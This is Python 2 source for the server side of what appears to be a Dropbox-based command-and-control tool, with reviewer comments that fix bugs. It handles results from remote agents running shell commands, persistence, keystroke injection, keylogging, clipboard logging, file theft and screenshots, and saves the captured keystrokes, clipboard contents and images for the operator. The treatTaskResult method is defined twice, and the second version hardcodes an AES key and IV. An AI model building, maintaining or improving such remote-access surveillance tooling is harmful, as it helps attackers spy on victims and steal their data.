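def treatPushedData(self, pushedDataFilePath):
    """Decrypt and print a data file pushed by an agent, then delete it.

    The file is read as bytes through ``self.dropboxHandler`` and decrypted
    with ``self.statusHandler.masterKey``. ``Crypto.decryptData`` returning
    ``None`` is treated as a failure.

    Args:
        pushedDataFilePath: remote path of the pushed data file.
    """
    # Read the pushed data result file
    result = Crypto.decryptData(
        self.dropboxHandler.readFile(pushedDataFilePath, resultFormat="bytes"),
        self.statusHandler.masterKey)

    if result is None:
        # The original message formatted `agentID`, a name this method never
        # defines, so the error path itself raised NameError. Only the file
        # path is known here, so that is what gets reported.
        print helpers.color(
            "\n[!] Error retrieving pushed data from file [{}]".format(
                pushedDataFilePath))
    else:
        # NOTE(review): decrypted agent-side data is echoed to the terminal
        # unfiltered; control characters in it reach the operator's console.
        print result

    # Delete the push result file on the server.
    # NOTE(review): indentation was lost in the listing; deletion is assumed
    # to run on both the success and the error path -- confirm.
    self.dropboxHandler.deleteFile(pushedDataFilePath)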
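def treatTaskResult(self, task, taskResultFilePath):
    """Process the result file of a completed task, then clean up.

    The result file is read as bytes through ``self.dropboxHandler`` and
    decrypted with ``self.statusHandler.masterKey``. A ``None`` result, or a
    result starting with "ERROR" for any command other than runCLI/runModule,
    stops command-specific treatment. The task is then removed from the task
    list and the result file is deleted.

    Args:
        task: dict providing the keys 'agentID', 'id', 'args' and 'cmd'.
        taskResultFilePath: remote path of the encrypted task result file.
    """
    # We have a match for a pending task that has completed
    agentID = task['agentID']
    taskID = task['id']
    args = task['args']
    cmd = task['cmd']
    proceed = True

    # Read the task result file
    result = Crypto.decryptData(
        self.dropboxHandler.readFile(taskResultFilePath, resultFormat="bytes"),
        self.statusHandler.masterKey)

    # Error handling
    if result is None:
        proceed = False
    elif cmd not in ("runCLI", "runModule"):
        # The original condition `cmd != "runCLI" or cmd != "runModule"` is
        # true for every value of cmd, so command output that merely began
        # with "ERROR" was reported as a task failure. Free-form command
        # output is now exempt from the prefix check.
        if result.startswith("ERROR"):
            print helpers.color(
                "\n[!] Task ID [{}] on agent ID [{}] failed with error: [{}]"
                .format(taskID, agentID, result))
            proceed = False

    # Proceed with task result treatment
    if proceed:
        # NOTE(review): `result` is agent-side data; it is printed unfiltered
        # and, for getFile, used as a remote path without validation.
        if cmd == "runCLI":
            print result
        elif cmd == "runModule":
            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed".format(
                    taskID, agentID))
            print "[{}]".format(task['cmd'])
            print ""
            print result
        elif cmd == "launchProcess":
            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                .format(taskID, agentID, result))
        elif cmd == "getFile":
            agentFile = args[0]

            # Compute a local file name based on the agent file name.
            # Backslashes are normalised first so basename() strips the
            # directory part of Windows-style paths as well; the file always
            # lands directly inside the incoming directory.
            localFile = os.path.join(
                cfg.defaultPath['incoming'],
                os.path.basename(agentFile.replace("\\", "/")))

            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                .format(taskID, agentID, result))
            print helpers.color(
                "[*] Please wait while downloading file [{}] and saving it to [{}]"
                .format(result, localFile))

            # Decrypt before opening the local file, so a failed decryption
            # neither truncates an existing file nor passes None to write().
            fileData = Crypto.decryptData(
                self.dropboxHandler.readFile(result, resultFormat="bytes"),
                self.statusHandler.masterKey)
            if fileData is None:
                print helpers.color(
                    "[!] Error decrypting downloaded file [{}]".format(result))
            else:
                # Binary mode: text mode ('w+') translates newlines on
                # Windows and corrupts non-text content.
                with open(localFile, 'wb') as fileHandle:
                    fileHandle.write(fileData)

                # Delete the remote file
                self.dropboxHandler.deleteFile(result)
                print helpers.color("[*] File saved [{}]".format(localFile))
        elif cmd == "sendFile":
            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                .format(taskID, agentID, result))
            print helpers.color("[*] [{}]".format(result))
        elif cmd == "sleep":
            # The second comma-separated field of the result is stored as the
            # wake-up time. NOTE(review): a result without a comma raises
            # IndexError here -- confirm the format is guaranteed.
            self.statusHandler.setAgentAttribute(agentID, "wakeUpTime",
                                                 result.split(",")[1])
            self.statusHandler.setAgentAttribute(agentID, "status", "SLEEPING")
            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                .format(taskID, agentID, result))
            print helpers.color("[*] Agent is going to sleep")
        elif cmd == "polling":
            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                .format(taskID, agentID, result))
        elif cmd == "stop":
            # Mark the agent dead and remove its status and command files.
            self.statusHandler.setAgentAttribute(agentID, "status", "DEAD")
            self.dropboxHandler.deleteFile(
                self.statusHandler.getAgentAttribute(agentID, "statusFile"))
            self.dropboxHandler.deleteFile(
                self.statusHandler.getAgentAttribute(agentID, "commandFile"))
            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                .format(taskID, agentID, result))

    # NOTE(review): indentation was lost in the listing; the cleanup below is
    # assumed to run whether or not `proceed` is set -- confirm.
    # Remove the task from the task list
    self.statusHandler.removeTask(task)

    # Delete the task result file on the server
    self.dropboxHandler.deleteFile(taskResultFilePath)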
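def treatTaskResult(self, task, taskResultFilePath):
    """Process the result file of a completed task, then clean up.

    The result file is read as a string through ``self.dropboxHandler``,
    base64-decoded, decrypted with AES in CBC mode and PKCS7-unpadded. A
    ``None`` result, or a result starting with "ERROR" for any command other
    than runCLI/runPSModule, stops command-specific treatment. The task is
    then removed from the task list and the result file is deleted.

    Args:
        task: dict providing the keys 'agentID', 'id', 'args' and 'cmd'.
        taskResultFilePath: remote path of the encoded task result file.
    """
    # We have a match for a pending task that has completed
    agentID = task['agentID']
    taskID = task['id']
    args = task['args']
    cmd = task['cmd']
    proceed = True

    # Read the task result file.
    # NOTE(review): key and IV are string literals in this method, so every
    # result file handled here uses the same key/IV pair. CBC decryption plus
    # PKCS7 unpadding carries no integrity check, so `result` below is
    # unauthenticated agent-side data.
    key = 'secret#456!23key'
    iv = 'Key@123Key@123fd'
    enc_cmdresult = self.dropboxHandler.readFile(taskResultFilePath,
                                                 resultFormat="string")
    decodetext = base64.b64decode(enc_cmdresult)
    aes = AES.new(key, AES.MODE_CBC, iv)
    encoder = PKCS7Encoder()
    paddedPlain = aes.decrypt(decodetext)
    result = encoder.decode(paddedPlain)

    # Error handling
    # NOTE(review): whether PKCS7Encoder.decode can return None is not
    # visible here; malformed input may raise instead -- confirm.
    if result is None:
        proceed = False
    elif cmd not in ['runCLI', 'runPSModule']:
        if result.startswith("ERROR"):
            print helpers.color(
                "\n[!] Task ID [{}] on agent ID [{}] failed with error: [{}]"
                .format(taskID, agentID, result))
            proceed = False

    # Proceed with task result treatment
    if proceed:
        # NOTE(review): `result` is printed unfiltered and, for getFile and
        # screenshot, used as a remote path without validation.
        if cmd in ['runCLI', 'runPSModule']:
            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed".format(
                    taskID, agentID))
            print "[{}]".format(task['cmd'])
            print ""
            print result
        elif cmd in ['launchProcess', 'polling', 'sendkeystrokes', 'persist']:
            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                .format(taskID, agentID, result))
        elif cmd == "getFile":
            agentFile = args[0]

            # Compute a local file name based on the agent file name.
            # Backslashes are normalised first so basename() strips the
            # directory part of Windows-style paths as well.
            localFile = os.path.join(
                cfg.defaultPath['incoming'],
                os.path.basename(agentFile.replace("\\", "/")))

            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                .format(taskID, agentID, result))
            print helpers.color(
                "[*] Please wait while downloading file [{}] and saving it to [{}]"
                .format(result, localFile))

            # NOTE(review): unlike the screenshot branch, the downloaded
            # content is written as read, with no decryption step -- confirm
            # this is intended.
            # Binary mode: text mode ('w+') translates newlines on Windows
            # and corrupts non-text content. The explicit close() inside the
            # `with` block was redundant and is dropped.
            with open(localFile, 'wb') as fileHandle:
                fileHandle.write(
                    self.dropboxHandler.readFile(result,
                                                 resultFormat="string"))
            print helpers.color("[*] File saved [{}]".format(localFile))

            # Delete the remote file
            self.dropboxHandler.deleteFile(result)
        elif cmd == "sendFile":
            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                .format(taskID, agentID, result))
            print helpers.color("\n[*] [{}]".format(result))
        elif cmd == "sleep":
            # The second comma-separated field of the result is stored as the
            # wake-up time. NOTE(review): a result without a comma raises
            # IndexError here -- confirm the format is guaranteed.
            self.statusHandler.setAgentAttribute(agentID, "wakeUpTime",
                                                 result.split(",")[1])
            self.statusHandler.setAgentAttribute(agentID, "status", "SLEEPING")
            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                .format(taskID, agentID, result))
            print helpers.color("[*] Agent is going to sleep")
        elif cmd == "keylogger":
            if args[0] == "stop":
                # Fixed file name: each run overwrites the previous capture.
                localFile = os.path.join(cfg.defaultPath['incoming'],
                                         "keylogger.txt")
                print helpers.color(
                    "\n[*] Task ID [{}] on agent ID [{}] completed successfully"
                    .format(taskID, agentID))
                print helpers.color(
                    "[*] Saving keylogger results to file [{}]".format(
                        localFile))
                with open(localFile, 'w+') as fileHandle:
                    fileHandle.write(result)
                print helpers.color(
                    "[*] File saved [{}]".format(localFile))
            else:
                print helpers.color(
                    "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                    .format(taskID, agentID, result))
        elif cmd == "clipboardlogger":
            if args[0] == "stop":
                print helpers.color(
                    "\n[*] Task ID [{}] on agent ID [{}] completed successfully"
                    .format(taskID, agentID))
                # Fixed file name: each run overwrites the previous capture.
                localFile = os.path.join(cfg.defaultPath['incoming'],
                                         "clipboardlogger.txt")
                print helpers.color(
                    "[*] Saving clipboard logger results to file [{}]".
                    format(localFile))
                with open(localFile, 'w+') as fileHandle:
                    fileHandle.write(result)
                print helpers.color(
                    "[*] File saved [{}]".format(localFile))
            else:
                print helpers.color(
                    "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                    .format(taskID, agentID, result))
        elif cmd == "screenshot":
            # Fixed local file name inside the incoming directory; each run
            # overwrites the previous screenshot.
            localFile = os.path.join(cfg.defaultPath['incoming'],
                                     "screenshot.jpg")

            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                .format(taskID, agentID, result))
            print helpers.color(
                "[*] Please wait while downloading file [{}] and saving it to [{}]"
                .format(result, localFile))

            # NOTE(review): this branch decrypts with Crypto.decryptData and
            # the master key, while the task result above uses the literal
            # AES key -- confirm which scheme applies to this file.
            # Decrypt before opening the local file, so a failed decryption
            # neither truncates an existing file nor passes None to write().
            imageData = Crypto.decryptData(
                self.dropboxHandler.readFile(result, resultFormat="bytes"),
                self.statusHandler.masterKey)
            if imageData is None:
                print helpers.color(
                    "[!] Error decrypting downloaded file [{}]".format(result))
            else:
                # Binary mode: a JPEG written in text mode is corrupted by
                # newline translation on Windows.
                with open(localFile, 'wb') as fileHandle:
                    fileHandle.write(imageData)
                print helpers.color("[*] File saved [{}]".format(localFile))

                # Delete the remote file
                self.dropboxHandler.deleteFile(result)
        elif cmd == "stop":
            # Mark the agent dead and remove its status and command files.
            self.statusHandler.setAgentAttribute(agentID, "status", "DEAD")
            self.dropboxHandler.deleteFile(
                self.statusHandler.getAgentAttribute(agentID, "statusFile"))
            self.dropboxHandler.deleteFile(
                self.statusHandler.getAgentAttribute(agentID, "commandFile"))
            print helpers.color(
                "\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
                .format(taskID, agentID, result))

    # NOTE(review): indentation was lost in the listing; the cleanup below is
    # assumed to run whether or not `proceed` is set -- confirm.
    # Remove the task from the task list
    self.statusHandler.removeTask(task)

    # Delete the task result file on the server
    self.dropboxHandler.deleteFile(taskResultFilePath)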